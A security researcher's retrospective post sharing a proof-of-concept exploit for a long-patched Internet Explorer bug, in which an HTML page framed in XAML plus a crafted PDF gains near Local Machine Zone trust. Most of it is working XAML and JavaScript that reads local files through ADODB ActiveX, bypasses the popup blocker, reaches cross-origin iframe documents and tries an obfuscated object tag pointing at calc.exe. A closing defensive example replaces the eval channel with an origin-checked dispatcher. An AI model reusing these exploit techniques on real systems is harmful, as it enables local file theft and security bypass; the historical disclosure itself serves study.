After playing around for a while with XAML’s <Frame> element and some earlier PDF work, I noticed that loading an HTML page inside a XAML Frame seemed to inherit a surprisingly elevated security context — something close to the Local Machine Zone. Combined with a specially crafted PDF that loaded a local file into an iframe, the combination let a page read local files, bypass the popup blocker, and access cross-origin iframe documents.
<!-- index.xaml: entry point that frames mainhtml.html -->
<Page xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
WindowTitle="XAML_PDF_PseudoLMZ">
<TextBlock HorizontalAlignment="Center" VerticalAlignment="Center">
<Bold>XAML_PDF_PseudoLMZ</Bold>
<LineBreak />
<Frame Width="800" Height="600" Source="mainhtml.html"/>
</TextBlock>
</Page>
<!-- mainhtml.html: runs inside the XAML Frame -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XAML_PDF_PseudoLMZ</title></head>
<body topmargin="0">
<font face="Tahoma" size="2">
<center>
<font size="5"><b>XAML_PDF_PseudoLMZ</b></font><br />
<font size="1">(needs Adobe Acrobat Reader installed and it <b>does not work</b> on Vista with Internet Protected Mode)</font>
</center>
<br />
<span id="mainMessage">
Click the Red Button that says "<font color="red"><b>Click here to Access Local Files</b></font>" in the PDF.
We will load the <b>file:///c:/windows/setuplog.txt</b> inside the IFRAME by using the "Hacked PDF" which is described in
the previous bug.
<br /><br />
</span>
<center>
<iframe id="wbControl" src="" width="760" height="500"></iframe><br /><br />
</center>
<script language="JavaScript">
opener = "";
window[0].location = "hacked.pdf";
function wait_setuplogTxt()
{
try
{
// This xDomain is just a bonus: after the setuplog.txt is loaded (local file), we can access the "D"ocument of that IFRAME with no problems.
justCheckingThatWeCanAccessTheDocument = document.all.wbControl.Document;
document.all.mainMessage.style.display = "none";
setTimeout('writeLMZIframe_ADODB()',1000);
}
catch (e)
{
setTimeout('wait_setuplogTxt()',1000);
}
}
function writeLMZIframe_ADODB()
{
var xStream = '<font face="Tahoma" size="2">' +
'Perfecto. This IFRAME has now some LMZ privileges, but we can\'t write files.<br />' +
'This is our location: ' +
'<b>' + document.all.wbControl.Document.URL + '</b><br />Let\'s read the file <b>c:/windows/system32/eula.txt</b> using <b>ADODB</b>.<br /><br />' +
'<b><font color="blue"><center>Please, doubleclick inside the textarea to execute the code:</center></font></b>' +
'<textarea ondblclick="eval(this.value)" style="width:720px;height:380px;">' +
'oConn = new ActiveXObject("ADODB.Connection");\noRs = new ActiveXObject("ADODB.Recordset");\noConn.open("DRIVER={Microsoft Text Driver (*.txt; *.csv)};ReadOnly=;DBQ=C:\\\\windows\\\\system32\\\\");\n\nx = oRs.Open ("Select * From eula.txt", oConn, 1, 3, 1);\nvar fullString = "";\nwhile (!oRs.eof)\n{\n for (var i=0; i<oRs.Fields.Count; i++)\n {\n fullString+=oRs.Fields(i).Value;\n }\n fullString+="\\n";\n oRs.MoveNext();\n}\nfullString = "file:///c:/windows/system32/eula.txt\\n\\n" + fullString.replace(/null/g, "");\nalert(fullString);\n\n// Simple communication trick to execute a function of my parent.\ntop.opener = "writeLMZIframe_openPopUps()";' +
'</textarea>' +
'</font>';
document.all.wbControl.Document.body.innerHTML = xStream;
}
function writeLMZIframe_openPopUps()
{
var xStream = '<font face="Tahoma" size="2">' +
'<b>Good!</b>. Now we will <b>bypass the popUp blocker</b>. As you can see, we are using a <font color="blue"><b>setTimeout</b></font> so we are sure that the ' +
'popUp blocker should stop them.<br /><br />' +
'<b><font color="blue"><center>Please, doubleclick inside the textarea to execute the code:</center></font></b>' +
'<textarea ondblclick="eval(this.value)" style="width:720px;height:380px;">' +
'window.openPopUps = function()\n{\n window.open("http://www.google.com");\n window.showModelessDialog("http://www.google.com");\n window.showHelp("http://www.google.com");\n window.showModalDialog("http://www.google.com");\n}\n\n// A Little delay of two seconds so no events are generated and the popUp blocker\n// should stop the popUps.\nsetTimeout("openPopUps();",2000);\n\n\n// Simple communication trick to execute a function of my parent.\ntop.opener = "writeLMZIframe_FailedExecution()";' +
'</textarea>' +
'</font>';
document.all.wbControl.Document.body.innerHTML = xStream;
}
function writeLMZIframe_FailedExecution()
{
var xStream = '<font face="Tahoma" size="2">' +
'<b>Perfect!</b>. Well, we can do a lot of things because this is almost like being at the LMZ Zone. However, we can not ' +
'write files. Well, I still did not find out.<br />' +
'Keep in mind that the only reason not to execute files is because (yet) we can not write them. The XAML engine (good!) ' +
'is not allowing us to do that.<br /> Let\'s see what happens with this classic:<br /><br />' +
'<object classid="cl' + 'sid' + ':111' + '111' + '11' + '-11' + '11-1' + '111-' + '111' + '1-1' + '111' + '111' + '111' + '11" co' + 'debas' + 'e="c:/' + 'windows/sys' + 'tem32/ca' + 'lc.exe"' + '></o' + 'bject><br /><br />' +
'<b><font color="blue"><center>Please, doubleclick inside the textarea to execute the code:</center></font></b>' +
'<textarea ondblclick="eval(this.value)" style="width:720px;height:120px;">' +
'document.body.insertAdjacentHTML(\'beforeEnd\',\'<obj' + 'ect cla' + 'ssid="cls' + 'id:11111' + '111-' + '11' + '11-111' + '1-111' + '1-111' + '11111' + '1111" cod' + 'ebas' + 'e="c:/w' + 'indows/sys' + 'tem32' + '/calc.ex' + 'e"></object>\');' +
'</textarea><br />' +
'Well, if we copy the calc.exe to C:\\WINDOWS\\Downloaded Program Files\\ at the right moment, it will execute. However, "the right moment" is not working automatically. <br /><br />' +
'So no execution yet. <b>End of Interactive Demo :)</b>' +
'</font>';
document.all.wbControl.Document.body.innerHTML = xStream;
}
function communication()
{
eval(window.opener);
window.opener = "";
}
setInterval("communication()",1000);
setTimeout("wait_setuplogTxt();",2000);
</script>
</body>
</html>
The core idea was that a page loaded inside a XAML <Frame> element ran with elevated trust, and combining that with the PDF-based local file loader created a context where normal cross-origin checks simply didn’t apply. From there it was straightforward to read local files with ADODB, open popups that bypassed the blocker, and access iframe document objects from other origins. The XAML engine did, thankfully, block actual file writes — so full code execution wasn’t reached, but the information-disclosure surface was quite wide. This only affected pre-Vista systems without Protected Mode enabled.
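The demo's parent frame polls window.opener once a second and evals whatever string the child frame wrote there, so any document that can reach the parent's opener property gets code execution in the parent. As an added example that is not part of the original PoC, here is a parent-side dispatcher that only runs registered handlers by name and only for an expected sender origin, the way a postMessage listener would. The handler names are the demo's three stage functions; their bodies, the trusted origin and the message shape are constructed assumptions.

```javascript
// Added example (not part of the original PoC): replaces the demo's
// `eval(window.opener)` polling with an allowlisted, origin-checked dispatch.
// The child can only name a registered handler; it cannot hand the parent code.

// Registered handlers keyed by the demo's stage names (bodies are constructed).
const HANDLERS = {
  writeLMZIframe_ADODB: () => "stage:adodb",
  writeLMZIframe_openPopUps: () => "stage:popups",
  writeLMZIframe_FailedExecution: () => "stage:failed",
};

// Origin the parent is willing to take commands from (constructed placeholder).
const TRUSTED_ORIGIN = "https://demo.example";

// Validate a message shaped like a `message` event ({ origin, data: { cmd } })
// and run the named handler. Returns { ok, result } or { ok, reason }.
// `hasOwnProperty` keeps prototype names such as "constructor" out of the allowlist.
function dispatchCommand(message, handlers = HANDLERS, trustedOrigin = TRUSTED_ORIGIN) {
  if (!message || message.origin !== trustedOrigin) {
    return { ok: false, reason: "untrusted origin" };
  }
  const cmd = message.data && message.data.cmd;
  if (typeof cmd !== "string" || !Object.prototype.hasOwnProperty.call(handlers, cmd)) {
    return { ok: false, reason: "unknown command" };
  }
  return { ok: true, result: handlers[cmd]() };
}

// Constructed sample messages: a legitimate stage request, the kind of raw
// JavaScript the PoC's eval channel would have accepted, a request from a
// foreign origin, and a prototype-chain name that must not resolve.
const SAMPLE_MESSAGES = [
  { origin: "https://demo.example", data: { cmd: "writeLMZIframe_ADODB" } },
  { origin: "https://demo.example", data: { cmd: "alert(document.cookie)" } },
  { origin: "https://evil.example", data: { cmd: "writeLMZIframe_openPopUps" } },
  { origin: "https://demo.example", data: { cmd: "constructor" } },
];

// Run every sample through the dispatcher; only the first one is accepted.
function runSamples() {
  return SAMPLE_MESSAGES.map((m) => dispatchCommand(m));
}
```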
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.